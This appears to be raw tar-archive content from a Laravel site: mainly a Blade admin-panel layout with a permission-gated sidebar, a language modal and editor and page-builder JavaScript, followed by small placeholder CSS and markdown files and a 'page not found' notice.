request()->is('admin/service/*/edit') || request()->is('admin/service-category/create') || request()->is('admin/service-category/*/edit') || request()->is('admin/service-feature/*/create') || request()->is('admin/service-feature/*/*/edit')) ? 'show' : '' }}" id="services"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/service-category/create') || request()->is('admin/service-category/*/edit')) ? 'active' : '' }}" href="{{ url('admin/service-category/create') }}">{{ __('content.categories') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/service/style1') || request()->is('admin/service-content/*/create') || request()->is('admin/service-info/*/create') || request()->is('admin/service/create/*') || request()->is('admin/service-feature/*/create') || request()->is('admin/service-feature/*/*/edit')) ? 'active' : '' }}" href="{{ url('admin/service/style1') }}">{{ __('content.services') }}</a></li> </ul> </div> </li> @endcan @can('portfolio check') <li class="nav-item {{ (request()->is('admin/portfolio/style1') || request()->is('admin/portfolio-content/*/create') || request()->is('admin/portfolio/create/*') || request()->is('admin/portfolio/*/edit') || request()->is('admin/portfolio-category/create') || request()->is('admin/portfolio-category/*/edit') || request()->is('admin/portfolio-detail/*/create') || request()->is('admin/portfolio-detail/*/*/edit') || request()->is('admin/portfolio-image/*/create') || request()->is('admin/portfolio-image/*/*/edit')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#portfolios" aria-expanded="false" aria-controls="portfolios"> <i class="fas fa-briefcase menu-icon"></i> <span class="menu-title">{{ __('content.portfolio') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/portfolio/style1') || request()->is('admin/portfolio-content/*/create') || request()->is('admin/portfolio/create/*') || request()->is('admin/portfolio/*/edit') || request()->is('admin/portfolio-category/create') || request()->is('admin/portfolio-category/*/edit') || request()->is('admin/portfolio-detail/*/create') || request()->is('admin/portfolio-detail/*/*/edit') || request()->is('admin/portfolio-image/*/create') || request()->is('admin/portfolio-image/*/*/edit')) ? 'show' : '' }}" id="portfolios"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/portfolio-category/create') || request()->is('admin/portfolio-category/*/edit')) ? 'active' : '' }}" href="{{ url('admin/portfolio-category/create') }}">{{ __('content.categories') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/portfolio/style1') || request()->is('admin/portfolio-content/*/create') || request()->is('admin/portfolio/create/*') || request()->is('admin/portfolio-detail/*/create') || request()->is('admin/portfolio-detail/*/*/edit') || request()->is('admin/portfolio-image/*/create') || request()->is('admin/portfolio-image/*/*/edit')) ? 'active' : '' }}" href="{{ url('admin/portfolio/style1') }}">{{ __('content.portfolio') }}</a></li> </ul> </div> </li> @endcan @can('team check') <li class="nav-item {{ (request()->is('admin/team/style1') || request()->is('admin/team/create/*') || request()->is('admin/team/*/edit') || request()->is('admin/team-category/create') || request()->is('admin/team-category/*/edit')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#teams" aria-expanded="false" aria-controls="teams"> <i class="fas fa-people-carry menu-icon"></i> <span class="menu-title">{{ __('content.teams') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/team/style1') || request()->is('admin/team/create/*') || request()->is('admin/team/*/edit') || request()->is('admin/team-category/create') || request()->is('admin/team-category/*/edit')) ? 'show' : '' }}" id="teams"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/team-category/create') || request()->is('admin/team-category/*/edit')) ? 'active' : '' }}" href="{{ url('admin/team-category/create') }}">{{ __('content.categories') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/team/style1') || request()->is('admin/team/create/*')) ? 'active' : '' }}" href="{{ url('admin/team/style1') }}">{{ __('content.teams') }}</a></li> </ul> </div> </li> @endcan @can('gallery check') <li class="nav-item {{ (request()->is('admin/gallery') || request()->is('admin/gallery/create') || request()->is('admin/gallery/*/edit') ) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#gallery" aria-expanded="false" aria-controls="gallery"> <i class="fas fa-images menu-icon"></i> <span class="menu-title">{{ __('content.gallery') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/gallery') || request()->is('admin/gallery/create') || request()->is('admin/gallery/*/edit')) ? 'show' : '' }}" id="gallery"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/gallery/create')) ? 'active' : '' }}" href="{{ url('admin/gallery/create') }}">{{ __('content.add_gallery') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/gallery')) ? 'active' : '' }}" href="{{ url('admin/gallery') }}">{{ __('content.gallery') }}</a></li> </ul> </div> </li> @endcan @can('career check') <li class="nav-item {{ (request()->is('admin/career/style1') || request()->is('admin/career-content/*/create') || request()->is('admin/career/create/*') || request()->is('admin/career/*/edit') || request()->is('admin/career-category/create') || request()->is('admin/career-category/*/edit')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#careers" aria-expanded="false" aria-controls="careers"> <i class="fas fa-folder-open menu-icon"></i> <span class="menu-title">{{ __('content.careers') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/career/style1') || request()->is('admin/career-content/*/create') || request()->is('admin/career/create/*') || request()->is('admin/career/*/edit') || request()->is('admin/career-category/create') || request()->is('admin/career-category/*/edit')) ? 'show' : '' }}" id="careers"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/career-category/create') || request()->is('admin/career-category/*/edit')) ? 'active' : '' }}" href="{{ url('admin/career-category/create') }}">{{ __('content.categories') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/career/style1') || request()->is('admin/career-content/*/create') || request()->is('admin/career/create/*')) ? 'active' : '' }}" href="{{ url('admin/career/style1') }}">{{ __('content.careers') }}</a></li> </ul> </div> </li> @endcan @can('page check') <li class="nav-item {{ (request()->is('admin/page') || request()->is('admin/page/create') || request()->is('admin/page/*/edit')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#pages" aria-expanded="false" aria-controls="pages"> <i class="fas fa-file-alt menu-icon"></i> <span class="menu-title">{{ __('content.pages') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/page') || request()->is('admin/page/create') || request()->is('admin/page/*/edit')) ? 'show' : '' }}" id="pages"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/page/create')) ? 'active' : '' }}" href="{{ url('admin/page/create') }}">{{ __('content.add_page') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/page') || request()->is('admin/page/*/edit')) ? 'active' : '' }}" href="{{ url('admin/page') }}">{{ __('content.pages') }}</a></li> </ul> </div> </li> @endcan @can('contact message check') <li class="nav-item {{ ( request()->is('admin/contact-message')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#contact-message" aria-expanded="false" aria-controls="contact-message"> <i class="fas fa-map-marked menu-icon"></i> <span class="menu-title">{{ __('content.contact') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ ( request()->is('admin/contact-message')) ? 'show' : '' }}" id="contact-message"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/contact-message')) ? 'active' : '' }}" href="{{ url('admin/contact-message') }}">{{ __('content.messages') }}</a></li> </ul> </div> </li> @endcan @can('subscribe check') <li class="nav-item {{ (request()->is('admin/subscribe/create')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#subscribers" aria-expanded="false" aria-controls="subscribers"> <i class="fas fa-at menu-icon"></i> <span class="menu-title">{{ __('content.subscribers') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/subscribe/create')) ? 'show' : '' }}" id="subscribers"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/subscribe/create')) ? 'active' : '' }}" href="{{ url('admin/subscribe/create') }}">{{ __('content.subscribers') }}</a></li> </ul> </div> </li> @endcan @can('setting check') <li class="nav-item {{ ( request()->is('admin/preloader/create') || request()->is('admin/favicon/create') || request()->is('admin/seo/create') || request()->is('admin/header-image/create/*') || request()->is('admin/header-image/create') || request()->is('admin/external-url/create') || request()->is('admin/footer-image/create/*') || request()->is('admin/footer-image/create') || request()->is('admin/panel-image/create') || request()->is('admin/site-info/create') || request()->is('admin/header-info/create') || request()->is('admin/header-info/create/*') || request()->is('admin/contact-info-widget/create') || request()->is('admin/contact-info-widget/create/*') || request()->is('admin/breadcrumb-image/create') || request()->is('admin/site-image/create') || request()->is('admin/social/create') || request()->is('admin/social/*/edit') || request()->is('admin/breadcrumb/create') || request()->is('admin/color-option/create') || request()->is('admin/google-analytic/create') || request()->is('admin/font/create') || request()->is('admin/draft-view/create') || request()->is('admin/tawk-to/create') || request()->is('admin/quick-access/create')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#settings" aria-expanded="false" aria-controls="settings"> <i class="fas fa-fw fa-cog menu-icon"></i> <span class="menu-title">{{ __('content.settings') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ ( request()->is('admin/preloader/create') || request()->is('admin/favicon/create') || request()->is('admin/seo/create') || request()->is('admin/header-image/create/*') || request()->is('admin/header-image/create') || request()->is('admin/external-url/create') || request()->is('admin/footer-image/create/*') || request()->is('admin/footer-image/create') || request()->is('admin/panel-image/create') || request()->is('admin/site-info/create') || request()->is('admin/header-info/create') || request()->is('admin/header-info/create/*') || request()->is('admin/contact-info-widget/create') || request()->is('admin/contact-info-widget/create/*') || request()->is('admin/breadcrumb-image/create') || request()->is('admin/site-image/create') || request()->is('admin/social/create') || request()->is('admin/social/*/edit') || request()->is('admin/breadcrumb/create') || request()->is('admin/color-option/create') || request()->is('admin/google-analytic/create') || request()->is('admin/font/create') || request()->is('admin/draft-view/create') || request()->is('admin/tawk-to/create') || request()->is('admin/quick-access/create')) ? 'show' : '' }}" id="settings"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/preloader/create')) ? 'active' : '' }}" href="{{ url('admin/preloader/create') }}">{{ __('content.preloader') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/favicon/create')) ? 'active' : '' }}" href="{{ url('admin/favicon/create') }}">{{ __('content.favicon') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/header-info/create') || request()->is('admin/header-info/create/*')) ? 'active' : '' }}" href="{{ url('admin/header-info/create') }}">{{ __('content.header_info') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/header-image/create/*') || request()->is('admin/header-image/create')) ? 'active' : '' }}" href="{{ url('admin/header-image/create') }}">{{ __('content.header_image') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/footer-image/create/*') || request()->is('admin/footer-image/create')) ? 'active' : '' }}" href="{{ url('admin/footer-image/create') }}">{{ __('content.footer_image') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/panel-image/create') || request()->is('admin/panel-image/create')) ? 'active' : '' }}" href="{{ url('admin/panel-image/create') }}">{{ __('content.panel_image') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/external-url/create')) ? 'active' : '' }}" href="{{ url('admin/external-url/create') }}">{{ __('content.external_url') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/contact-info-widget/create') || request()->is('admin/contact-info-widget/create/*')) ? 'active' : '' }}" href="{{ url('admin/contact-info-widget/create') }}">{{ __('content.contact_info_widget') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/breadcrumb-image/create')) ? 'active' : '' }}" href="{{ url('admin/breadcrumb-image/create') }}">{{ __('content.breadcrumb_image') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/site-info/create')) ? 'active' : '' }}" href="{{ url('admin/site-info/create') }}">{{ __('content.site_info') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/social/create') || request()->is('admin/social/*/edit')) ? 'active' : '' }}" href="{{ url('admin/social/create') }}">{{ __('content.socials') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/google-analytic/create')) ? 'active' : '' }}" href="{{ url('admin/google-analytic/create') }}">{{ __('content.google_analytic') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/font/create')) ? 'active' : '' }}" href="{{ url('admin/font/create') }}">{{ __('content.font') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/draft-view/create')) ? 'active' : '' }}" href="{{ url('admin/draft-view/create') }}">{{ __('content.draft_view') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/tawk-to/create')) ? 'active' : '' }}" href="{{ url('admin/tawk-to/create') }}">{{ __('content.tawk_to') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/quick-access/create')) ? 'active' : '' }}" href="{{ url('admin/quick-access/create') }}">{{ __('content.quick_access_buttons') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/color-option/create')) ? 'active' : '' }}" href="{{ url('admin/color-option/create') }}">{{ __('content.color_option') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/seo/create')) ? 'active' : '' }}" href="{{ url('admin/seo/create') }}">{{ __('content.seo') }}</a></li> </ul> </div> </li> @endcan @hasrole ('super-admin') <li class="nav-item {{ (request()->is('admin/admin-role') || request()->is('admin/admin-role/create') || request()->is('admin/admin-role/*/edit')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#admin_roles" aria-expanded="false" aria-controls="admin_roles"> <i class="fas fa-user-lock menu-icon"></i> <span class="menu-title">{{ __('content.admin_role_manage') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/admin-role') || request()->is('admin/admin-role/create') || request()->is('admin/admin-role/*/edit')) ? 'show' : '' }}" id="admin_roles"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/admin-role/create')) ? 'active' : '' }}" href="{{ url('admin/admin-role/create') }}">{{ __('content.add_admin_role') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/admin-role')) ? 'active' : '' }}" href="{{ url('admin/admin-role') }}">{{ __('content.admin_roles') }}</a></li> </ul> </div> </li> <li class="nav-item {{ (request()->is('admin/admin-user') || request()->is('admin/admin-user/create') || request()->is('admin/admin-user/*/edit')) ? 'active' : '' }}"> <a class="nav-link" data-toggle="collapse" href="#admins" aria-expanded="false" aria-controls="admins"> <i class="fas fa-users menu-icon"></i> <span class="menu-title">{{ __('content.admin_manage') }}</span> <i class="ti-angle-right"></i> </a> <div class="collapse {{ (request()->is('admin/admin-user') || request()->is('admin/admin-user/create') || request()->is('admin/admin-user/*/edit')) ? 'show' : '' }}" id="admins"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/admin-user/create')) ? 'active' : '' }}" href="{{ url('admin/admin-user/create') }}">{{ __('content.add_admin_user') }}</a></li> <li class="nav-item"> <a class="nav-link {{ (request()->is('admin/admin-user')) ? 'active' : '' }}" href="{{ url('admin/admin-user') }}">{{ __('content.all_admin') }}</a></li> </ul> </div> </li> @endhasrole @can('language check') <li class="nav-item {{ (request()->is('admin/language/create') || request()->is('admin/language/*/edit') || request()->is('admin/language-keyword-for-adminpanel/create/*') || request()->is('admin/language/*/edit') || request()->is('admin/language/*/edit')) ? 'active' : '' }}"> <a class="nav-link" href="{{ url('admin/language/create') }}"> <i class="fas fa-language menu-icon"></i> <span class="menu-title">{{ __('content.languages') }}</span> </a> </li> @endcan @can('clear cache check') <li class="nav-item {{ (request()->is('admin/clear-cache')) ? 'active' : '' }}"> <a class="nav-link" href="{{ url('admin/clear-cache') }}"> <i class="fab fa-cloudscale menu-icon"></i> <span class="menu-title">{{ __('content.optimizer') }}</span> </a> </li> @endcan </ul> </nav> <!-- partial --> <div class="main-panel"> <div class="content-wrapper"> <div class="container-fluid"> @yield('content') </div> </div> </div> </div> @if (session()->has('site_url')) <div class="back-to-site"> <a href="{{ route('go-to-site-url.index', ['site_url' => session()->get('site_url')]) }}" class="btn btn-primary">{{ __('content.see_edit') }} <i class="fas fa-angle-right"></i></a> </div> @endif <div class="modal fade" id="processedLanguageModal" tabindex="-1" role="dialog" aria-labelledby="processedLanguageModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="processedLanguageModalLabel">{{ __('content.which_language') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> <form action="{{ route('language.update_processed_language') }}" method="POST"> @method('PATCH') @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="language_id">{{ __('content.languages') }}</label> <select class="form-control" name="language_id" id="language_id" required> @foreach ($languages as $lang) <option value="{{ $lang->id }}" {{ $lang->status == 1 ? 'selected' : '' }}>{{ $lang->language_name }}</option> @endforeach @php unset($lang); @endphp </select> <small id="language_id" class="form-text text-muted">{{ __('content.reminding') }}</small> </div> </div> <div class="col-12"> <button type="submit" class="btn btn-primary"> {{ __('content.submit') }} </button> </div> </div> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> </div> <!-- Plugins Js --> <script src="{{ asset('assets/admin/side_menu/js/jquery.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/popper.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/bootstrap.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/bundle.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/fullscreen.js') }}"></script> <!-- Active JS --> <script src="{{ asset('assets/admin/side_menu/js/canvas.js') }}" defer></script> <script src="{{ asset('assets/admin/side_menu/js/collapse.js') }}" defer></script> <script src="{{ asset('assets/admin/side_menu/js/settings.js') }}" defer></script> <script src="{{ asset('assets/admin/side_menu/js/template.js') }}" defer></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/active.js') }}" defer></script> @isset ($galleries) <!-- Light box JS --> <script src="{{ asset('assets/admin/side_menu/js/default-assets/ekko-lightbox.min.js') }}" defer></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/lightbox.min.js') }}" defer></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/light-box-active.js') }}" defer></script> @endif <!-- Datatable JS --> <script src="{{ asset('assets/admin/side_menu/js/default-assets/jquery.datatables.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/datatables.bootstrap4.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/datatable-responsive.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/responsive.bootstrap4.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/datatable-button.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/button.bootstrap4.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/button.html5.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/button.flash.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/button.print.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/datatables.keytable.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/datatables.select.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/demo.datatable-init.js') }}"></script> <!-- Tags Input JS --> <script src="{{ asset('assets/admin/side_menu/js/default-assets/jquey.tagsinput.min.js') }}"></script> <!-- Datepicker JS --> <script src="{{ asset('assets/admin/side_menu/js/default-assets/moment.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/bootstrap-colorpicker.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/colorpicker-bootstrap.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/bootstrap-datepicker.min.js') }}"></script> <script src="{{ asset('assets/admin/side_menu/js/default-assets/form-picker.js') }}"></script> <!-- Summer note scripts --> <script src="{{ asset('assets/admin/side_menu/js/summernote-bs4.min.js') }}"></script> <!-- Icon Picker JS --> <script src="{{ asset('assets/admin/side_menu/vendor/fontawesome-free/js/fontawesome-iconpicker.min.js') }}"> </script> <!-- Custom JS --> <script src="{{ asset('assets/admin/side_menu/js/custom.js') }}"></script> <script> // Tags Input Separate (function ($) { "use strict"; $('#summernote').summernote({ placeholder: '{{ __('content.description') }}', tabsize: 2, height: 400 }); $('#summernote2').summernote({ placeholder: '{{ __('content.description') }}', tabsize: 2, height: 100 }); // Summernote code view saving $('.note-codable').on('blur', function() { var codeviewHtml = $(this).val(); var $summernoteTextarea = $(this).closest('.note-editor').siblings('textarea'); $summernoteTextarea.val(codeviewHtml); }); $('#general-item-list').tagsInput({ 'width': '100%', 'height': '85%', 'interactive': true, 'defaultText': '{{ __('content.add_more') }}', 'removeWithBackspace': true, 'minChars': 0, 'maxChars': 200, 'placeholderColor': '#555' }); $('#about-item-list').tagsInput({ 'width': '100%', 'height': '85%', 'interactive': true, 'defaultText': '{{ __('content.add_more') }}', 'removeWithBackspace': true, 'minChars': 0, 'maxChars': 200, 'placeholderColor': '#555' }); $('#service-item-list').tagsInput({ 'width': '100%', 'height': '85%', 'interactive': true, 'defaultText': '{{ __('content.add_more') }}', 'removeWithBackspace': true, 'minChars': 0, 'maxChars': 200, 'placeholderColor': '#555' }); $('#feature-list').tagsInput({ 'width': '100%', 'height': '85%', 'interactive': true, 'defaultText': '{{ __('content.add_more') }}', 'removeWithBackspace': true, 'minChars': 0, 'maxChars': 200, 'placeholderColor': '#555' }); $('#non-feature-list').tagsInput({ 'width': '100%', 'height': '85%', 'interactive': true, 'defaultText': '{{ __('content.add_more') }}', 'removeWithBackspace': true, 'minChars': 0, 'maxChars': 200, 'placeholderColor': '#555' }); $('#tag-list').tagsInput({ 'width': '100%', 'height': '85%', 'interactive': true, 'defaultText': '{{ __('content.add_more') }}', 'removeWithBackspace': true, 'minChars': 0, 'maxChars': 200, 'placeholderColor': '#555' }); @isset ($page_builder) // start draggable const dropzoneSource = document.querySelector(".source"); const dropzone = document.querySelector(".target"); const dropzones = [...document.querySelectorAll(".easier-dropzone")]; const draggables = [...document.querySelectorAll(".easier-draggable")]; function getDragAfterElement(container, y) { const draggableElements = [ ...container.querySelectorAll(".easier-draggable:not(.easier-is-dragging)"), ]; return draggableElements.reduce( (closest, child) => { const box = child.getBoundingClientRect(); const offset = y - box.top - box.height / 2; if (offset < 0 && offset > closest.offset) { return { offset, element: child, }; } else { return closest; } }, { offset: Number.NEGATIVE_INFINITY } ).element; } draggables.forEach((draggable) => { draggable.addEventListener("dragstart", (e) => { draggable.classList.add("easier-is-dragging"); }); draggable.addEventListener("dragend", (e) => { draggable.classList.remove("easier-is-dragging"); }); // Add touch event listeners for mobile devices draggable.addEventListener("touchstart", (e) => { draggable.classList.add("easier-is-dragging"); }); draggable.addEventListener("touchend", (e) => { draggable.classList.remove("easier-is-dragging"); }); }); dropzones.forEach((zone) => { zone.addEventListener("dragover", (e) => { e.preventDefault(); const afterElement = getDragAfterElement(zone, e.clientY); const draggable = document.querySelector(".easier-is-dragging"); if (afterElement === null) { zone.appendChild(draggable); } else { zone.insertBefore(draggable, afterElement); } updateItemData(dropzone, "updated_item"); updateItemData(dropzoneSource, "left_item"); }); // Add touch event listeners for mobile devices zone.addEventListener("touchmove", (e) => { e.preventDefault(); const touch = e.touches[0]; const afterElement = getDragAfterElement(zone, touch.clientY); const draggable = document.querySelector(".easier-is-dragging"); if (afterElement === null) { zone.appendChild(draggable); } else { zone.insertBefore(draggable, afterElement); } updateItemData(dropzone, "updated_item"); updateItemData(dropzoneSource, "left_item"); }); }); dropzone.addEventListener("drop", (e) => { e.preventDefault(); updateItemData(dropzone, "updated_item"); }); dropzoneSource.addEventListener("drop", (e) => { e.preventDefault(); updateItemData(dropzoneSource, "left_item"); }); function updateItemData(zone, inputId) { const items = [...zone.querySelectorAll(".easier-draggable")]; const itemData = items.map((item, index) => { return { id: item.id, folder: item.getAttribute("data-value"), order: index + 1, }; }); const itemDataJson = JSON.stringify(itemData); const itemDataInput = document.getElementById(inputId); itemDataInput.value = itemDataJson; } // end draggable // Add click events to buttons document.querySelectorAll('.move-button').forEach(button => { button.addEventListener('click', (e) => { const direction = button.dataset.direction; const currentItem = button.parentNode; const newDirection = direction === 'left' ? 'right' : 'left'; // Reverse direction button.setAttribute('data-direction', newDirection); // Set the new direction of the button const destinationZone = direction === 'left' ? dropzoneSource : dropzone; const targetZone = direction === 'left' ? dropzone : dropzoneSource; targetZone.appendChild(currentItem); // Create new item list const items = [...destinationZone.querySelectorAll(".easier-draggable")]; const itemData = items.map((item, index) => { return { id: item.id, folder: item.getAttribute("data-value"), order: index + 1, }; }); // Convert the new item list to JSON format const itemDataJson = JSON.stringify(itemData); // Insert the new item list into the relevant input if (direction === 'left') { document.getElementById("left_item").value = itemDataJson; } else { document.getElementById("updated_item").value = itemDataJson; } // Another operation such as saving to the database can be done here // Update relevant sections updateItemData(destinationZone, direction === 'left' ? "left_item" : "updated_item"); updateItemData(targetZone, direction === 'left' ? "updated_item" : "left_item"); }); }); // start on text hover function toggleImage() { const links = document.querySelectorAll('.link'); const images = document.querySelectorAll('img'); links.forEach(link => { link.addEventListener('mouseenter', () => { const target = link.dataset.target; const image = document.getElementById(target); image.style.display = 'block'; }); link.addEventListener('mouseleave', () => { const target = link.dataset.target; const image = document.getElementById(target); image.style.display = 'none'; }); }); } toggleImage(); // end on text hover @endisset @isset ($page_builders) // start get segment count // Selecting the select element const pageNameSelect = document.getElementById("page_name"); // Selecting the div element const selectedSegmentCountDiv = document.getElementById("selectedSegmentCountDiv"); // Adding an event listener to the select element when it changes pageNameSelect.addEventListener("change", function() { // Getting the selected option const selectedOption = pageNameSelect.options[pageNameSelect.selectedIndex]; // Getting the data-segment-count attribute const segmentCount = selectedOption.getAttribute("data-segment-count"); // Updating the div content using the attribute selectedSegmentCountDiv.textContent = "{{ __('content.segment_count') }} " + segmentCount; }); // end get segment count @endisset }(jQuery)); </script> </body> </html> �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������css/app.css�����������������������������������������������������������������������������������������0000644�����������������00000000073�14765366573�0006654 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@tailwind base; @tailwind components; @tailwind utilities; ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������markdown/terms.md�����������������������������������������������������������������������������������0000644�����������������00000000130�14765366573�0010062 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Terms of Service Edit this file to define the terms of service for your application. ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������markdown/policy.md����������������������������������������������������������������������������������0000644�����������������00000000124�14765366573�0010232 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Privacy Policy Edit this file to define the privacy policy for your application. ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
Page is not found
Oops! Page not found.
Sorry, an error has occured, Requested page not found!
Back To Homepage